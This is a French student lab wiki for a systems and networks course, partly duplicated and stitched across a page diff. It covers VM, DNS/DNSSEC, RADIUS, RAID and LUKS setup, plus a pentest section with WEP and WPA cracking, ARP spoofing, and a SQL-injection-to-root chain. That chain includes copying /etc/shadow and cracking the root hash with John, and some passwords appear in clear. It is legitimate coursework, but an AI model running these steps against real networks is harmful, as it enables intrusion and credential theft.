belle-rose.site has RRSIG record DNSKEY 5 2 604800 20220210082130 20220111082130 22094 belle-rose.site. JLB0MJqr8rfBq2MiVrZaRyDo/7/7V1GUGwCi108w8CgeUrIdImgXERY4 2nXQ21aym3Po0i+zs5DmEonEkTGMi63kjUG8ZeFjMCFm7KtNhRK8FkQk Be2yzv3odAhh/gmMyRsMa7yoLwaDWZVd4NkCJ6EaqNXP7yspcHD6pmHt 4RKJgCUo6zpLAJnFiU1cwIR+lS/HeFEW2OzOtvi/LH8bL1zewioEpTgi qHLplK68KR/1cX/4Dq2C3CaeChteMx//EkW9Vmwjg9BhRjE/VCa8P80w qJEiXeg8KXYLkCEiBK5ifgKy5EMxDG5q18ieRXaUc0F6FpG0A4POpTVx pscHmA==<br />
belle-rose.site has DNSKEY record 257 3 5 AwEAAbbNBQJskwFezV1LwDsxAkCVbOcy4X3/mgffMjd/3FIHZpkdVrk3 w88041cgWbVSmom0ma8fFNqntidWlO//rMPvKT0ex3dqCse7on3/odox vxR3Zh5hPdv4K7X35BLuZta4x/RCBLgiFVyXo12qqBl0Htxn2hRyycKv 2caEYwnyRI75KSrr5f5XtQS8LyZCbtmMAp5YJu1wiDxwLcUwwJKvYS+q dtq4sm3KwW+qbjcUswkMMjXNAsvzwZ5FyHcondvvPuErc+Fhdvpxyoq+ W44ynLRnz7cb3R44z/TXFCwNlQI3MWzFvhbDK1YeJLpqjgYrET4eqqka mbFMYuLPQzE=<br />
belle-rose.site has DNSKEY record 256 3 5 AwEAAdZrHCSjl8nMZ0pwfODUtCs4nD6iStiZzuBAfWTsm75qpG6JJzpr e3Oqqyr/Dm1bwXbLQUd0GNgGAidiAQtkbZIb/5ZQxuVxft2kp0GKUr34 44Bw1Gh8af1Npk9cqK368U6oD+EIrV2AnA2KC/KXm+DziNOkmifaFVvO rh6p91Ut<br />
belle-rose.site has RRSIG record NSEC 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. RXnysXybktajyP82ERJn1m9z/5dkOQABIzfUPf2/08jFQq96AMmEggH2 sAy/3wv6SKiwAvBN3dFkYtIefMAK0MdLykIwwLrGQwK1BSv5KKLCowtO Bdks2pjgBPFE4J/MnBnBXSm0HunudjziNgz+PN3bY/IieyPzIBfpHM0y UfM=<br />
belle-rose.site has NSEC record ns1.belle-rose.site. NS SOA RRSIG NSEC DNSKEY<br />
belle-rose.site has RRSIG record NS 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. GZRzkPkOu/RKjCE2+NWhHfTcicDCoaBq/QjimrrVPsMcse0pPebFZkTr lRHMLHZEglzopIigLwj3DQ7yjuB6EiAhudUWwZri82LjkVs+z5ItMPo6 kudNvs5oUqVGX7E6toy5rU11yBgPDNijuCI1aahUJpwAEOl9sGi9uJ9I NaI=<br />
belle-rose.site has RRSIG record SOA 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. rDQsyAPj2RG4epQ7AFGrpU4JzyAi1kif3X4N8L+53IrlNWMcByyCVtAA 1XRQ8+Ag7f8/Z7nMhLbRuPtEH6efhZJfhEOuuU0SK7Nernm6WgkCS4UI e4VVtXtbHLeM+CncfUywqpKRhyZB9qEpzloNdI6zyOlzS9bH9qMwZFSS TWY=<br />
belle-rose.site has SOA record ns1.belle-rose.site. postmaster.belle-rose.site. 6 604800 86400 2419200 604800<br />
<br />
= Tests d'intrusion =<br />
<br />
== Exploitation de failles du système ==<br />
<br />
Après plusieurs recherches, nous avons trouvé un petit soft permettant d'audit notre système et y afficher les possibles failles. > https://github.com/mzet-/linux-exploit-suggester<br />
<br />
En suivant la documentation :<br />
<br />
$ wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh<br />
$ chmod +x les.sh && ./les.sh<br />
<br />
On obtient les failles suivantes (audit réalisé sur notre VM) :<br />
<br />
[+] [CVE-2021-27365] linux-iscsi<br />
...<br />
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write<br />
...<br />
[+] [CVE-2019-13272] PTRACE_TRACEME<br />
...<br />
<br />
== Cassage de clef WEP d’un point d’accès WiFi ==<br />
<br />
On commence par rechercher le nom de notre interface. On utilise alors la commande (en root) :<br />
<br />
$ airmon-ng<br />
<br />
On trouve l'interface suivante :<br />
<br />
wlx40a5ef0127d0<br />
<br />
On essaie de démarrer l'interface sur le channel 3 :<br />
<br />
$ airmon-ng start wlx40a5ef0127d0 3<br />
<br />
Or on remarque que la réponse de la commande nous indique que l'interface a été renommé automatiquement "wlan0mon". On ré-utilise la commande précédente avec le nouveau nom d'interface :<br />
<br />
$ airmon-ng start wlan0mon 3<br />
<br />
On écoute ensuite tous les paquets dans l'air :<br />
<br />
$ airodump-ng wlan0mon<br />
<br />
A partir de là, on peut choisir un point d'accès à cracker en utilisant son BSSID (obtenu par la commande précédente). On choisit cracotte06.<br />
<br />
$ aireplay-ng -9 -e cracotte06 -a 04:DA:D2:9C:50:55 wlan0mon<br />
<br />
On peut récupérer les VI générés par le point d'accès en les stockant dans les fichiers output. On donne le channel 4 puisque le point d'accès est sur ce channel :<br />
<br />
$ airodump-ng -c 4 --bssid 04:DA:d2:9C:50:55 -w output wlan0mon<br />
<br />
On effectue de fausses authentifications avec la commande aireplay-ng dans un nouveau terminal :<br />
<br />
$ aireplay-ng -1 0 -e cracotte06 -a 04:DA:D2:9C:50:55 -h 40:A5:EF:01:0E:5F wlan0mon<br />
<br />
L'adresse MAC source donnée après le -h est obtenue lorsque l'on récupère les VI.<br />
<br />
Il faut maintenant laisser tourner la commande de récupération des VI assez longtemps pour obtenir assez de données (pour nous içi il a fallu attendre 40000 datas). On peut ensuite décrypter la clef WEP :<br />
<br />
$ aircrack-ng -b 04:DA:D2:9C:50:55 output*.cap<br />
<br />
On obtient alors :<br />
<br />
KEY FOUND ! [ 55:55:55:55:5A:BC:07:CB:A4:44:44:44:44 ]<br />
Decrypted correctly: 100%<br />
<br />
== Cassage de mot de passe WPA-PSK par force brute ==<br />
<br />
$ airmon-ng<br />
$ airmon-ng start wlan0mon 9<br />
$ airodump-ng wlan0mon<br />
<br />
On choisit le point d'accès kracotte06 à cracker. On récupère son BSSID avec la commande précédente et on utilise :<br />
<br />
$ airodump-ng -c 4 --bssid 44:AD:D9:5F:87:05 -w psk wlan0mon<br />
<br />
On crée le dictionnaire contenant toutes les clefs à tester avec la commande <code>crunch</code><br />
<br />
$ crunch 8 8 0123456789 -o dictionnaire.lst<br />
<br />
Pour savoir si un Handshake a été trouvé, on utilise la commande :<br />
<br />
$ aircrack-ng psk*.cap<br />
<br />
On trouve : <br />
<br />
# BSSID ESSID Encryption<br />
1 44:AD:D9:5F:87:05 kracotte06 WPA (1 handshake)<br />
<br />
On peut alors lancer la commande de test des clefs :<br />
<br />
$ aircrack-ng -w dictionnaire.lst -b 44:AD:D9:5F:87:05 psk*.cap<br />
<br />
Après un peu d'attente, on obtient la clef suivante :<br />
<br />
KEY FOUND! [ 59906999 ]<br />
<br />
== Attaque de type "homme au milieu" par usurpation ARP ==<br />
<br />
On branche un PC bleu sur une zabeth en ethernet et on lui configure une IP. Ensuite on peut installer dsniff et wireshark.<br />
<br />
On fait :<br />
<br />
$ echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Puis on se fait passer pour le routeur (172.26.145.254) auprès de la zabeth (172.26.145.61):<br />
<br />
$ arpspoof -t 172.26.145.61 172.26.145.254<br />
<br />
En lançant wireshark, on peut voir les informations envoyées par la zabeth passer en clair.<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
Sur honey.plil.info : <br />
<br />
1. injection SQL<br />
<br />
2. connexion en tant qu'admin<br />
<br />
3. telechargement du fichier "config-db.php" (On remarque que il existe une BDD phpmyadmin) et "database.php" (ce fichier semble lui ne pas nous apporter d'informations)<br />
<br />
4. honey.plil.info/phpmyadmin -> connexion avec les logins trouvés dans le fichier "config-db.php" (phpmyadmin et gencovid19). On trouve alors une table "pma_users" indiquant le nom de plusieurs utilisateurs (totor62, manuals, phpmyadmin et root).<br />
<br />
5. en essayant le mdp "gencovid19" avec ces identifiants sur phpmyadmin : on peut se connecter en tant que "root" sur la BDD et on trouve le mdp de rex dans la bdd "test" et table "users".<br />
<br />
6. connexion en ssh sur rex@honey.plil.info.<br />
<br />
7. comme indication : "le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets". Alors on va créer un fichier de mots de 4 lettre pour ensuite doubler ces mots (exemple : bobo => bobobobo) pour essayer de cracker le mot de passe par la force brute. On créée alors le dictionnaire avec l'utilitaire crunch comme pour obtenir les clefs WEP :<br />
<br />
$ crunch 4 4 abcdefghijklmnopqrstuvwxyz > dico.txt<br />
<br />
Et on double la taille des mots :<br />
<br />
$ sed -i 's/\(.*\)/\1\1/' dico.txt<br />
<br />
On copie ensuite les fichiers "/etc/passwd" et "/etc/shadow" de rex@honey.plil.info sur notre zabeth. <br />
<br />
$ scp rex@honey.plil.info:/etc/passwd .<br />
$ scp rex@honey.plil.info:/etc/shadow .<br />
<br />
On utilise alors l'utilitaire "shadow" pour obtenir un fichier contenant le mot de passe haché de root :<br />
<br />
$ unshadow passwd shadow | head -1 > honey<br />
<br />
Puis on utilise "John the Ripper" pour cracker le mot de passe :<br />
<br />
$ john -w:dico.txt honey<br />
<br />
Après quelques minutes, on peut afficher le mot de passe trouvé :<br />
<br />
$ john --show honey<br />
root:fortfort:0:0:root:/root:/bin/bash<br />
1 password hash cracked, 0 left<br />
<br />
On trouve le mot de passe de root@honey.plil.info qui est "fortfort".<br />
<br />
= Point d'accès Wi-Fi authentifié via FreeRADIUS =<br />
<br />
== Configuration du point d'accès ==<br />
<br />
=== Point d'accès ===<br />
<br />
Tout d'abord il faut configurer l'authentification EAP dans la configuration :<br />
<br />
conf t<br />
<br />
aaa new-model<br />
aaa authentication login eap_rose group radius_rose<br />
radius-server host 193.48.57.181 auth-port 1812 acct-port 1813 key zinzin<br />
aaa group server radius radius_rose<br />
server 193.48.57.181 auth-port 1812 acct-port 1813<br />
exit<br />
<br />
Configurons le SSID :<br />
<br />
conf t<br />
<br />
dot11 ssid SSID_ROSE<br />
vlan 5<br />
authentication open eap eap_rose<br />
authentication network-eap eap_rose<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
exit<br />
<br />
On associe notre SSID à l'interface WIFI :<br />
<br />
conf t<br />
<br />
interface Dot11Radio0<br />
encryption vlan 5 mode ciphers aes-ccm tkip<br />
ssid SSID_ROSE<br />
mbssid<br />
exit<br />
exit<br />
<br />
On paramètre notre VLAN (5)<br />
<br />
conf t<br />
<br />
interface Dot11Radio0.5<br />
encapsulation dot1Q 5<br />
no ip route-cache<br />
bridge-group 5<br />
bridge-group 5 subscriber-loop-control<br />
bridge-group 5 spanning-disabled<br />
bridge-group 5 block-unknown-source<br />
exit<br />
exit<br />
<br />
On configure l'interface filaire<br />
<br />
conf t<br />
<br />
interface GigabitEthernet0.5<br />
encapsulation dot1Q 5<br />
bridge-group 5<br />
exit<br />
exit<br />
<br />
Enfin, on configure l'IP de l'AP et sa gateway<br />
<br />
conf t<br />
<br />
ip default-gateway 10.1.0.1<br />
interface BVI 1<br />
ip address 10.1.0.3 255.255.255.0<br />
exit<br />
exit<br />
<br />
=== Routeur ===<br />
<br />
Commençons par configurer le VLAN 1 <br />
<br />
conf t<br />
<br />
interface vlan 1<br />
ip address 10.1.0.1 255.255.255.0<br />
exit<br />
exit<br />
<br />
Puis on configure le port (ici Gi1/0/3<br />
<br />
conf t<br />
<br />
interface Gi1/0/3<br />
switchport<br />
switchport mode trunk<br />
switchport trunk allowed vlan add 1<br />
exit<br />
exit<br />
<br />
Et voilà mon grand<br />
<br />
== Serveur FreeRADIUS ==<br />
<br />
Installation de freeRADIUS<br />
<br />
apt install freeradius<br />
<br />
On commence par configurer <code>/etc/freeradius/3.0/clients.conf</code> à détailler<br />
<br />
client zozo {<br />
ipaddr = 10.1.0.3/24<br />
secret = zinzin<br />
}<br />
<br />
ensuite <code>/etc/freeradius/3.0/eap.conf</code><br />
<br />
eap {<br />
[...]<br />
default_eap_type = peap<br />
}<br />
<br />
puis <code>/etc/freeradius/3.0/users</code><br />
<br />
[...]<br />
root Cleartext-Password := "glopglop"<br />
<br />
Pour vérifier que tout fonctionne bien, on peut lancer freeradius en mode debug <code>freeradius -X</code> (après avoir au préalable stoppé le processus)<br />
<br />
= Réalisations =<br />
<br />
== Sécurisation des données (RAID 5) ==<br />
<br />
Nous avons besoin de 3 LV à rajouter à notre VM :<br />
<br />
$ lvcreate -L1G -n Bellerose-raid1 storage<br />
$ lvcreate -L1G -n Bellerose-raid2 storage<br />
$ lvcreate -L1G -n Bellerose-raid3 storage<br />
<br />
Nous pouvons ainsi les rajouter à la configuration de notre VM (<code>/etc/xen/Bellerose.cfg</code>):<br />
<br />
'phy:/dev/storage/Bellerose-raid1,xvda5,w'<br />
'phy:/dev/storage/Bellerose-raid2,xvda6,w'<br />
'phy:/dev/storage/Bellerose-raid3,xvda7,w'<br />
<br />
Nous pouvons ensuite créer le RAID en relançant la VM et en se connectant dessus.<br />
<br />
$ apt install mdadm<br />
<br />
On va ensuite créer un disque nommé <code>/dev/md0</code> grâce à <code>mdadm</code> :<br />
<br />
$ mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7<br />
<br />
On peut ainsi vérifier que notre RAID 5 est effectif :<br />
<br />
$ lsblk<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
xvda5 202:5 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda6 202:6 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda7 202:7 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
<br />
Enfin il faut monter ce disque fraîchement créé :<br />
<br />
$ mkfs.ext4 /dev/md0<br />
$ mkdir /media/raid<br />
<br />
on ajoute cette ligne dans <code>/etc/fstab</code> :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
puis<br />
<br />
$ mount -a<br />
<br />
et toc<br />
<br />
== Chiffrement des données ==<br />
<br />
On branche la clé USB sur le petit PC bleu, et on lance <code>lsblk</code> et on trouve :<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
sda 8:0 1 7,2G 0 disk <br />
<br />
Donc on peut formater la clef qui contient déjà quelque chose dessus :<br />
<br />
$ mkfs.ext4 /dev/sda<br />
<br />
Avec <code>cryptsetup</code> on peut initialiser la clef et lui donner un mdp :<br />
<br />
$ cryptsetup luksFormat /dev/sda<br />
<br />
On crée une partition chiffrée sur la clé :<br />
<br />
$ cryptsetup luksOpen /dev/sda data<br />
<br />
Et on formate :<br />
<br />
$ mkfs.ext4 /dev/mapper/data<br />
<br />
On monte cette partition pour lui permettre de contenir des fichiers :<br />
<br />
$ mkdir /mnt/data-usb<br />
$ mount -t ext4 /dev/mapper/data /mnt/data-usb<br />
<br />
On y ajoute donc un fichier de test :<br />
<br />
$ touch /mnt/data-usb/boujour.txt<br />
<br />
Puis on démonte et on ferme le volume chiffré<br />
<br />
$ umont /mnt/data-usb<br />
$ cryptsetup luksClose data<br />
<br />
Ensuite en branchant la clé USB sur un autre PC pour voir le fonctionnement de notre chiffrement, et lorsqu'on essaie d'accèder à la clef, celle ci nous demande un mot de passe pour accèder aux fichiers, donc le chiffrement fonctionne correctement.</div>Bjacquothttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G6&diff=57833TP sysres IMA5 2021/2022 G62022-01-11T14:35:38Z<p>Bjacquot : /* Serveur SSh */</p>
<hr />
<div>__TOC__<br />
<br style="clear: both;"/><br />
<br />
=Création de la machine virtuelle=<br />
<br />
On veut créer notre machine virtuelle sur l'hyperviseur (HV) capbreton. Afin de pouvoir télécharger l'image Debian, on utilise tout d'abord la commande suivante :<br />
<br />
$ export http_proxy=http://proxy.plil.fr:3128<br />
<br />
Pour lancer la création de la machine virtuelle, on doit donner le nom de la machine qui sera Bellerose (d'après le thème des noms de bière). Ensuite nous avons l'adresse IP qui nous a été attribuée lors de la répartition des groupes (donc pour nous ce sera 193.48.57.181). On donne aussi l'adresse IP du routeur flottant (193.48.57.190) et le masque du réseau (255.255.255.240 car c'est un /28). On indique également l'emplacement des disques virtuels : /usr/local/xen, le mot de passe pour se connecter à la machine virtuelle : pasglop, et la distribution que nous allons utiliser qui est Debian bullseye.<br />
<br />
$ xen-create-image --hostname=Bellerose --ip=193.48.57.181 --gateway=193.48.57.190 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
On crée ensuite 2 LV de 10 Go (nommés Bellerose1 et Bellerose2) sur le groupe de volume storage.<br />
<br />
$ lvcreate -L10G -n Bellerose1 storage<br />
$ lvcreate -L10G -n Bellerose2 storage<br />
<br />
Puis il faut les formater au format ext4, alors on utilise les commandes suivantes :<br />
<br />
$ mkfs.ext4 /dev/storage/Bellerose1<br />
$ mkfs.ext4 /dev/storage/Bellerose2<br />
<br />
On modifie notre fichier /etc/xen/Bellerose.cfg pour indiquer à la machine virtuelle qu'elle possède les volumes logiques Bellerose1 et Bellerose2 (on ajoute alors 2 lignes dans la fonction disk) et on ajoute le bridge IMA5sc dans la fonction vif.<br />
<br />
$ vim /etc/xen/Bellerose.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Bellerose1,xvda3,w',<br />
'phy:/dev/storage/Bellerose2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.181 ,mac=00:16:3E:FA:D0:95 ,bridge=IMA5sc' ]<br />
<br />
On peut maintenant lancer notre machine virtuelle :<br />
<br />
$ xl create -c /etc/xen/Bellerose.cfg<br />
<br />
Avec la commande :<br />
<br />
$ cat /etc/fstab<br />
<br />
On voit xvda1 et xvda2. On va créer xvda3 et xvda4 pour pouvoir y mettre les répertoires var et home de notre machine virtuelle :<br />
<br />
$ mkdir /mnt/xvda3<br />
$ mkdir /mnt/xvda4<br />
$ mount /dev/xvda3 /mnt/xvda3<br />
$ mount /dev/xvda4 /mnt/xvda4<br />
<br />
Puis on déplace le répertoire var dans le disque xvda4 :<br />
<br />
$ mv /var/* /mnt/xvda4<br />
<br />
Pour monter les disques, on ajoute ces lignes dans le fichier /etc/fstab :<br />
<br />
# /home vers xvda3<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
# /var vers xvda4<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On monte le tout à l'aide de la commande :<br />
<br />
mount -a<br />
<br />
Enfin avec lsblk, on peut voir les deux partitions de notre VM :<br />
<br />
$ lsblk<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
Enfin, nous activons l'IPv6 sur l'interface en modifiant <code>/etc/network/interfaces</code><br />
<br />
iface eth0 inet6 auto<br />
<br />
Pour quitter la VM : CTRL+]<br />
<br />
= Services Internet =<br />
<br />
== Serveur SSH ==<br />
<br />
$ apt install openssh-server<br />
<br />
on édite le fichierde conf <code>/etc/ssh/sshd_config</code> (via ssh key) :<br />
<br />
PermitRootLogin without-password // je l'ai repassé en "yes" suite au mail et le mdp root est celui de pifou habituel <br />
PubkeyAuthentication yes<br />
<br />
après on reload la conf<br />
<br />
$ systemctl reload ssh<br />
<br />
On génère une clé ssh avec <code>ssh-keygen -t ed25519</code> et on l'ajoute dans <code>/.ssh/authorized_keys</code> et c'est gooooood<br />
<br />
== Serveur DNS ==<br />
<br />
on achète le ndd<br />
<br />
on crée un "Glue Record" pour notre nameserver <code>ns1.belle-rose.site</code><br />
<br />
on install bind<br />
<br />
$ apt install bind9<br />
<br />
on configure <code>/etc/resolv.conf</code><br />
<br />
nameserver 127.0.0.1<br />
<br />
on configure bind <code>/etc/bind/named.conf.local</code><br />
<br />
zone "belle-rose.site" IN {<br />
type master;<br />
file "/etc/bind/db.belle-rose.site";<br />
allow-transfer { 217.70.177.40; };<br />
};<br />
<br />
On ajoute nos ns <code>/etc/bind/db.belle-rose.site</code><br />
<br />
;<br />
; BIND dans ta face<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.belle-rose.site. postmaster.belle-rose.site. (<br />
2 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.belle-rose.site.<br />
@ IN NS ns6.gandi.net.<br />
ns1 IN A 193.48.57.181<br />
<br />
Ensuite on peut tester notre conf avec<br />
<br />
$ host -t any ns1.belle-rose.site localhost<br />
Using domain server:<br />
Name: localhost<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
ns1.belle-rose.site has address 193.48.57.181<br />
<br />
Et on incrémente aussi le Serial dans <code>/etc/bind/db.belle-rose.site</code> à 3.<br />
<br />
== Certificat ==<br />
<br />
Notre certificat Gandi nous a été retiré de force par quelqu'un de mal intentionné. De ce fait, nous avons utilisé un certificat <code>Let's Encrypt</code>. Après avoir installé <code>certbot</code>, on utilise simplement la commande :<br />
<br />
certbot --apache<br />
<br />
https://www.belle-rose.site/ IZOK<br />
<br />
== DNSSEC ==<br />
<br />
On suit les étapes suivantes :<br />
<br />
1. On ajoute l’option <code>dnssec-enable yes;</code> dans le fichier <code>named.conf.options</code><br />
<br />
2. On crée un répertoire <code>belle-rose.site.dnssec</code> pour y générer les clefs<br />
<br />
3. On crée la clef asymétrique de signature de clefs de zone :<br />
<br />
$ dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE belle-rose.site<br />
<br />
4. On crée la clef asymétrique de la zone pour signer les enregistrements<br />
<br />
$ dnssec-keygen -a RSASHA1 -b 1024 -n ZONE belle-rose.site <br />
<br />
5. On renomme les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);<br />
<br />
$ mv Kbelle-rose.site.+005+37138.key belle-rose.site-ksk.key<br />
$ mv Kbelle-rose.site.+005+35638.key belle-rose.site-zsk.key<br />
$ mv Kbelle-rose.site.+005+37138.private belle-rose.site-ksk.private<br />
$ mv Kbelle-rose.site.+005+35638.private belle-rose.site-zsk.private<br />
<br />
6. On inclue les clefs publiques dans votre fichier de zone <code>/etc/bind/db.belle-rose.site</code>, et on incrémente le numéro de version de la zone ;<br />
<br />
$include /etc/bind/belle-rose.site.dnssec/belle-rose.site-ksk.key<br />
$include /etc/bind/belle-rose.site.dnssec/belle-rose.site-zsk.key<br />
<br />
7. On signe les enregistrements de la zone ;<br />
<br />
$ dnssec-signzone -o belle-rose.site -k belle-rose.site-ksk ../db.belle-rose.site belle-rose.site-zsk<br />
<br />
8. On modifie le fichier <code>named.conf.local</code> pour utiliser la zone signée de suffixe .signed :<br />
<br />
$ vim ../named.conf.local<br />
zone "belle-rose.site" IN {<br />
type master;<br />
file "/etc/bind/db.belle-rose.site.signed";<br />
allow-transfer { 217.70.177.40; };<br />
};<br />
<br />
9. il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier www.belle-rose.site-ksk.key) à notre registrar (sur gandi.net, dans la section "Manage DNSSEC" puis "DNS servers")<br />
<br />
root@Bellerose:/etc/bind/belle-rose.site.dnssec# cat belle-rose.site-ksk.key <br />
; This is a key-signing key, keyid 22094, for belle-rose.site.<br />
; Created: 20220111091701 (Tue Jan 11 09:17:01 2022)<br />
; Publish: 20220111091701 (Tue Jan 11 09:17:01 2022)<br />
; Activate: 20220111091701 (Tue Jan 11 09:17:01 2022)<br />
belle-rose.site. IN DNSKEY 257 3 5 AwEAAbbNBQJskwFezV1LwDsxAkCVbOcy4X3/mgffMjd/3FIHZpkdVrk3 w88041cgWbVSmom0ma8fFNqntidWlO//rMPvKT0ex3dqCse7on3/odox vxR3Zh5hPdv4K7X35BLuZta4x/RCBLgiFVyXo12qqBl0Htxn2hRyycKv 2caEYwnyRI75KSrr5f5XtQS8LyZCbtmMAp5YJu1wiDxwLcUwwJKvYS+q dtq4sm3KwW+qbjcUswkMMjXNAsvzwZ5FyHcondvvPuErc+Fhdvpxyoq+ W44ynLRnz7cb3R44z/TXFCwNlQI3MWzFvhbDK1YeJLpqjgYrET4eqqka mbFMYuLPQzE=<br />
<br />
(on copie que la partie chiffrée, pas le record DNSKEY)<br />
<br />
10. Enfin, nous pouvons tester la configuration:<br />
<br />
root@Bellerose:~# host -t any belle-rose.site<br />
belle-rose.site has RRSIG record DS 8 2 3600 20220210205226 20220111074233 56238 site. t5ANbAiG69DP5E9ccCIMtEEMs1urP6mSQpb210bDUbCD7vdXqONhLJ9M dcjyHQjhdTWKd9qc48tnY8fwL4PUeOYLexcaUEQgLMkbEBUDMzpcvMsb n4sM2BXgk7lJ9vyE1zsgfBNg7X8IV5c7sRrEuZyg7VbjPYmqx5BJ3cC8 Dy0=<br />
belle-rose.site has DS record 22094 5 2 86D5EAC51853FAA1865BB63C0F353EEB50D5A59093409E66A3F7044C AC3AF70F<br />
belle-rose.site name server ns6.gandi.net.<br />
belle-rose.site name server ns1.belle-rose.site.<br />
belle-rose.site has RRSIG record DNSKEY 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. bh2pFBuNXANoGib6RK5MAab6xy7jbUEYVOr6Pk/pa8weJPD/ACk0Z1pm urvc++ReoccxNxNy+BCd2Ri1GLhZ+kGXrF8xuNUYdyo+zpd+zZUgrx1C hKRSUqeBVpAn0uyDlRtG8cPPw01iYpDBCqmnif7+GblIH6eSJhOf+98d l8o=<br />
belle-rose.site has RRSIG record DNSKEY 5 2 604800 20220210082130 20220111082130 22094 belle-rose.site. JLB0MJqr8rfBq2MiVrZaRyDo/7/7V1GUGwCi108w8CgeUrIdImgXERY4 2nXQ21aym3Po0i+zs5DmEonEkTGMi63kjUG8ZeFjMCFm7KtNhRK8FkQk Be2yzv3odAhh/gmMyRsMa7yoLwaDWZVd4NkCJ6EaqNXP7yspcHD6pmHt 4RKJgCUo6zpLAJnFiU1cwIR+lS/HeFEW2OzOtvi/LH8bL1zewioEpTgi qHLplK68KR/1cX/4Dq2C3CaeChteMx//EkW9Vmwjg9BhRjE/VCa8P80w qJEiXeg8KXYLkCEiBK5ifgKy5EMxDG5q18ieRXaUc0F6FpG0A4POpTVx pscHmA==<br />
belle-rose.site has DNSKEY record 257 3 5 AwEAAbbNBQJskwFezV1LwDsxAkCVbOcy4X3/mgffMjd/3FIHZpkdVrk3 w88041cgWbVSmom0ma8fFNqntidWlO//rMPvKT0ex3dqCse7on3/odox vxR3Zh5hPdv4K7X35BLuZta4x/RCBLgiFVyXo12qqBl0Htxn2hRyycKv 2caEYwnyRI75KSrr5f5XtQS8LyZCbtmMAp5YJu1wiDxwLcUwwJKvYS+q dtq4sm3KwW+qbjcUswkMMjXNAsvzwZ5FyHcondvvPuErc+Fhdvpxyoq+ W44ynLRnz7cb3R44z/TXFCwNlQI3MWzFvhbDK1YeJLpqjgYrET4eqqka mbFMYuLPQzE=<br />
belle-rose.site has DNSKEY record 256 3 5 AwEAAdZrHCSjl8nMZ0pwfODUtCs4nD6iStiZzuBAfWTsm75qpG6JJzpr e3Oqqyr/Dm1bwXbLQUd0GNgGAidiAQtkbZIb/5ZQxuVxft2kp0GKUr34 44Bw1Gh8af1Npk9cqK368U6oD+EIrV2AnA2KC/KXm+DziNOkmifaFVvO rh6p91Ut<br />
belle-rose.site has RRSIG record NSEC 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. RXnysXybktajyP82ERJn1m9z/5dkOQABIzfUPf2/08jFQq96AMmEggH2 sAy/3wv6SKiwAvBN3dFkYtIefMAK0MdLykIwwLrGQwK1BSv5KKLCowtO Bdks2pjgBPFE4J/MnBnBXSm0HunudjziNgz+PN3bY/IieyPzIBfpHM0y UfM=<br />
belle-rose.site has NSEC record ns1.belle-rose.site. NS SOA RRSIG NSEC DNSKEY<br />
belle-rose.site has RRSIG record NS 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. GZRzkPkOu/RKjCE2+NWhHfTcicDCoaBq/QjimrrVPsMcse0pPebFZkTr lRHMLHZEglzopIigLwj3DQ7yjuB6EiAhudUWwZri82LjkVs+z5ItMPo6 kudNvs5oUqVGX7E6toy5rU11yBgPDNijuCI1aahUJpwAEOl9sGi9uJ9I NaI=<br />
belle-rose.site has RRSIG record SOA 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. rDQsyAPj2RG4epQ7AFGrpU4JzyAi1kif3X4N8L+53IrlNWMcByyCVtAA 1XRQ8+Ag7f8/Z7nMhLbRuPtEH6efhZJfhEOuuU0SK7Nernm6WgkCS4UI e4VVtXtbHLeM+CncfUywqpKRhyZB9qEpzloNdI6zyOlzS9bH9qMwZFSS TWY=<br />
belle-rose.site has SOA record ns1.belle-rose.site. postmaster.belle-rose.site. 6 604800 86400 2419200 604800<br />
<br />
= Tests d'intrusion =<br />
<br />
== Exploitation de failles du système ==<br />
<br />
Après plusieurs recherches, nous avons trouvé un petit soft permettant d'audit notre système et y afficher les possibles failles. > https://github.com/mzet-/linux-exploit-suggester<br />
<br />
En suivant la documentation :<br />
<br />
$ wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh<br />
$ chmod +x les.sh && ./les.sh<br />
<br />
